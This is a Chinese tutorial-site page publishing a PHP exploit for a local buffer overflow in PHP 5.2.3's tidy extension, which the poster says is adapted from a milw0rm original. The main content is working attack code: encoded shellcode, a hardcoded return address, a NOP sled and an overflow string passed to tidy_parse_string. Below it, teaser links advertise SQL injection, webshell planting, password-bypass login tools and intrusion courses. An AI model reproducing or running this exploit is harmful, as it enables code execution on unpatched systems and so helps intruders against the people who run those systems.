PHP 5.2.3 tidy扩展本地溢出漏洞利用代码

所属分类: 实用技巧 / 安全教程 阅读数: 840
收藏 0 赞 0 分享
复制代码 代码如下:

<?php 

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} 

$scode = 
"\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". 
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1". 
"\x8c\xff\x26\xa9\x0b\x87\x39\xbd\x9f\x38\x22\xca\xff\xe6\x53\x27". 
"\xb6\x6d\x67\x3c\x48\x9f\xb9\x82\xd2\xf3\x3e\xc2\x91\x0c\xfe\x09". 
"\x54\x13\xc2\x65\x93\x28\x96\x5d\x58\x3b\xf3\x15\x3f\xe7\xfa\xc2". 
"\xa6\x6c\xf0\x5f\xac\x2d\x15\x61\x59\x5a\x39\xea\x9c\xb7\xcb\xb0". 
"\xba\x43\x0f\x79\x03\x2f\x04\x3a\xb3\x2a\xda\xc3\xbf\xbf\x9b\x3f". 
"\x4b\xcf\x07\xed\xc0\x47\x30\x06\xdf\x1c\xc0\x68\xe0\x22\xc1\x03". 
"\x89\x1e\x9e\x22\xbc\x3e\x76\xcc\xb8\x3d\xb6\xb5\x68\x29\xc7\xc0". 
"\x8d\xf6\x4f\x4d\x73\x82\x9e\x3a\x73\x75\xfd\xa9\xef\x57\x67\x4a". 
"\x95\x87\x48\xc9\x75\xa9\xf3\x79\x56\x40\x8f\xe4\xe4\x8a\x1d\x86". 
"\x71\xa2\xd5\x2b\xa2\x40\x77\xd5\xca\x90\x14\x05\x24\x99\x9e\x01". 
"\x1a\x3f\x39\xaa\x34\x5a\x31\x8a\xa4\xcb\xda\xab\x58\x74\x6f\x43". 
"\xd4\x0a\xaf\xda\x72\x87\xc6\xb2\x13\x24\x6d\x39\x85\xbe\xe2\xcf". 
"\x36\x1e\x8f\x4e\xc0\x36\x5b\xf2\x12\xe9\xe2\xb0\x16\xf5\xe4\x38". 
"\x97\xf5\xe4\x38\x97"; 


$EIP="\xD8\x69\x83\x7C";  
$NOP=str_repeat("\x90",12); 
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode; 
tidy_parse_string(1,$____buff,1); 
?> 


看了MILW0RM上的EXP稍微改了下,中
更多精彩内容其他人还在看

不用xp_cmdshell照样执行命令

删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell 利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了 主要是由于Jet允许调用VBA的shell()函
收藏 0 赞 0 分享

MySQL注入中导出字段内容的研究通过注入导出WebShell

大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0 赞 0 分享

Dedecms getip()的漏洞利用代码

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0 赞 0 分享

NtGodMode.exe任意密码登录windows系统帐号下载

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
收藏 0 赞 0 分享

dvbbs 8.2 SQL Injection注射漏洞分析

利用方式:一个典型的sql注射漏洞,按照公告里说的用
收藏 0 赞 0 分享

整理比较全的Access SQL注入参考

不知谁整理的access sql注入资料比较全
收藏 0 赞 0 分享

SQL Injection with MySQL 注入分析

本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
收藏 0 赞 0 分享

入侵ASP.net网站的经验附利用代码

爱好入侵的可以用下面的方法,做网站的朋友就需要了解下面的asp.net的利用代码,最好来测试下
收藏 0 赞 0 分享

黑鹰VIP教程-脚本入侵班全部提供下载

爱好脚本的朋友有福了,脚本入侵班资料下载
收藏 0 赞 0 分享

非常不错的脚本入侵基础知识总结第1/2页

简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0 赞 0 分享
查看更多